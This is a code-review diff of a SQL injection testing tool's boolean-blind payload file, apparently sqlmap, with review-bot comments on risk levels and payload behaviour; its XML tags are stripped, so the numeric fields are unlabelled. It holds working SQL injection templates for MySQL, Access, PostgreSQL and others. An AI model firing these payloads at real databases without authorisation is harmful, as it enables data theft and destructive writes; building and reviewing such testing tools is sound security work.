diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml index 4b5fe3901..76a1aaadd 100644 --- a/xml/payloads/01_boolean_blind.xml +++ b/xml/payloads/01_boolean_blind.xml @@ -13,10 +13,10 @@ Tag: Valid values: 1: Boolean-based blind SQL injection 2: Error-based queries SQL injection - 3: UNION query SQL injection + 3: Inline queries SQL injection 4: Stacked queries SQL injection 5: Time-based blind SQL injection - 6: Inline queries SQL injection + 6: UNION query SQL injection Sub-tag: From which level check for this test. @@ -170,6 +170,22 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause + 1 + 1 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + + + OR [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 @@ -187,6 +203,23 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause (Generic comment) + 1 + 2 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + -- + + + OR [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 @@ -207,39 +240,6 @@ Tag: - - OR boolean-based blind - WHERE or HAVING clause - 1 - 1 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - - - OR ([RANDNUM]=[RANDNUM1]) - - - - - OR boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 2 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - -- - - - OR ([RANDNUM]=[RANDNUM1]) - - - OR boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 @@ -247,13 +247,13 @@ Tag: 3 1 2 - OR ([INFERENCE]) + OR [INFERENCE] - OR ([RANDNUM]=[RANDNUM]) + OR [RANDNUM]=[RANDNUM] # - OR ([RANDNUM]=[RANDNUM1]) + OR [RANDNUM]=[RANDNUM1]
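Review bot: Swapping technique numbers 3 and 6 in the header comment changes what `<stype>3</stype>` and `<stype>6</stype>` mean to a reader of this file, yet the first hunk touches only the comment. If the engine's technique constants already number inline queries 3 and UNION 6, this is a documentation correction and the commit message should say so; if they do not, every payload entry carrying stype 3 or 6, here and in the other payload files, must be renumbered in the same change or the detection phases will load the wrong tests. The constants are not visible in this diff, so please confirm which case applies before merging.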
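Review bot: The new OR-based boolean tests added at the 170 and 187 hunks carry risk 3 (the third numeric field, assuming the stripped tags follow the usual stype/level/risk/clause/where order), which is the right gate, but nothing in the file records why. An always-true `OR` term injected into the WHERE clause of an UPDATE or DELETE widens the statement to every row, so these tests are destructive against write paths; I would add `<!-- OR-based: risk 3 because a true condition in an UPDATE/DELETE WHERE clause affects every row -->` above each OR entry so the gating is not lowered casually. The move from `OR ([INFERENCE])` to `OR [INFERENCE]` is fine as long as inference expressions stay single comparisons; an inference with a top-level OR followed by the original query's trailing `AND ...` would parse differently without the parentheses, so that assumption is worth a one-line comment too.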
MySQL @@ -261,7 +261,47 @@ Tag: - MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) + AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + %16 + + + AND [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + %16 + + + OR [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause 1 2 1 @@ -395,35 +435,83 @@ Tag: - Generic boolean-based blind - Parameter replace + MySQL >= 5.0 boolean-based blind - Parameter replace + 1 + 1 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + +
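Review bot: The `%16` comment used by the two new Microsoft Access tests URL-decodes to the control byte 0x16, not to a SQL comment token, so the payload only terminates the trailing query if that byte reaches the Jet engine exactly once-decoded; any tamper script or application-side encoding that re-encodes `%` turns it into literal text and the original query suffix is no longer cut off. A comment next to those entries would save the next reader a debugging session, e.g. `<!-- %16 is a raw 0x16 byte, not a SQL comment; it must reach the engine unaltered -->`. Both entries are restricted to Microsoft Access in their details block, which is correct; the AND variant at level 3 and the OR variant at level 3 / risk 3 match how the other dialect-comment tests in this file are gated, again assuming the stripped tags are stype/level/risk/clause/where.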
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 boolean-based blind - Parameter replace (original value) 1 2 1 1,2,3 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) +
+ MySQL + >= 5.0 +
- Generic boolean-based blind - Parameter replace (original value) + MySQL < 5.0 boolean-based blind - Parameter replace + 1 + 2 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL + < 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - Parameter replace (original value) 1 3 1 1,2,3 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) +
+ MySQL + < 5.0 +
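Review bot: The FALSE branch of the MySQL < 5.0 parameter-replace tests relies on `(SELECT [RANDNUM] FROM mysql.db)` returning more than one row so that the multiplication errors, which requires both SELECT privilege on the `mysql` schema and at least two rows in `mysql.db`; when either is missing the TRUE and FALSE probes behave identically (both fail, or neither does), so the test silently never fires rather than producing a false positive. That is acceptable for a fallback scoped to `< 5.0`, but it should be written down, e.g. `<!-- FALSE branch errors via "subquery returns more than 1 row"; needs SELECT on mysql.db with >1 row -->`. Retiring the generic `1/(SELECT 0)` form for MySQL is the right call, presumably because MySQL returns NULL for division by zero unless strict mode is on and the old payload could not separate the branches; stating that rationale in the commit would help future maintainers. The >= 5.0 variant keys on INFORMATION_SCHEMA.CHARACTER_SETS, readable by any user, so it does not share the privilege dependency, and adding the `< 5.0` version to the previously unversioned `MySQL` entries closes the overlap between the two sets.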
@@ -505,7 +593,7 @@ Tag: MySQL boolean-based blind - Parameter replace (bool*int) 1 - 5 + 4 1 1,2,3 3 @@ -540,84 +628,6 @@ Tag:
- - MySQL >= 5.0 boolean-based blind - Parameter replace - 1 - 1 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - -
- MySQL - >= 5.0 -
-
- - - MySQL >= 5.0 boolean-based blind - Parameter replace (original value) - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - -
- MySQL - >= 5.0 -
-
- - - MySQL < 5.0 boolean-based blind - Parameter replace - 1 - 3 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
- MySQL -
-
- - - MySQL < 5.0 boolean-based blind - Parameter replace (original value) - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
- MySQL -
-
- PostgreSQL boolean-based blind - Parameter replace 1 @@ -660,7 +670,7 @@ Tag: PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) 1 - 3 + 5 1 1,2,3 3 @@ -680,7 +690,7 @@ Tag: PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) 1 - 4 + 5 1 1,2,3 3 @@ -853,41 +863,9 @@ Tag: - + - Generic boolean-based blind - GROUP BY and ORDER BY clauses - 1 - 2 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) - - - - - Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) - 1 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - - - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause 1 2 1 @@ -907,9 +885,9 @@ Tag: - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 4 + 3 1 2,3 1 @@ -927,7 +905,7 @@ Tag: - MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause 1 3 1 @@ -942,13 +920,14 @@ Tag:
MySQL + < 5.0
- MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 5 + 4 1 2,3 1 @@ -961,13 +940,14 @@ Tag:
MySQL + < 5.0
- PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses + PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause 1 - 3 + 2 1 2,3 1 @@ -985,9 +965,9 @@ Tag: - PostgreSQL boolean-based blind - ORDER BY clauses (original value) + PostgreSQL boolean-based blind - ORDER BY clause (original value) 1 - 5 + 4 1 3 1 @@ -1008,10 +988,10 @@ Tag: It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is --> - + PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES) 1 - 3 + 5 1 3 @@ -1071,7 +1051,7 @@ Tag: - Oracle boolean-based blind - GROUP BY and ORDER BY clauses + Oracle boolean-based blind - ORDER BY, GROUP BY clause 1 3 1 @@ -1090,7 +1070,7 @@ Tag: - Oracle boolean-based blind - GROUP BY and ORDER BY clauses (original value) + Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 4 1 @@ -1109,9 +1089,9 @@ Tag: - Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause 1 - 3 + 4 1 2,3 1 @@ -1128,9 +1108,9 @@ Tag: - Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses (original value) + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 4 + 5 1 2,3 1 @@ -1147,9 +1127,9 @@ Tag: - SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause 1 - 3 + 4 1 2,3 1 @@ -1166,9 +1146,9 @@ Tag: - SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses (original value) + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 4 + 5 1 2,3 1 @@ -1183,13 +1163,13 @@ Tag: SAP MaxDB - + MySQL >= 5.0 boolean-based blind - Stacked queries 1 - 3 + 4 1 0 1 @@ -1210,7 +1190,7 @@ Tag: MySQL < 5.0 boolean-based blind - Stacked queries 1 - 4 + 5 1 0 1 @@ -1224,6 +1204,7 @@ Tag:
MySQL + < 5.0
@@ -1251,7 +1232,7 @@ Tag: PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES) 1 - 4 + 5 1 0 1 @@ -1335,7 +1316,7 @@ Tag: Microsoft Access boolean-based blind - Stacked queries 1 - 4 + 5 1 0 1